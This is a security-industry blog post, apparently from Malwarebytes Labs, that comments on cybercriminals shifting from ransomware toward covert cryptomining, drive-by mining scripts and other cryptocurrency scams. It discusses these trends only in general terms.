There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.


The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade-off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website, as opposed to building the ransomware, paying some developers, messing around with onion sites, writing up long FAQs for the victims, maintaining C&C servers, ensuring the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low-traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on YouTube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast-moving plague, and throws the old arguments over blocking ads while hurting publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.


Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in a bit of a self-imposed time-out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

Categories: Techie Feeds

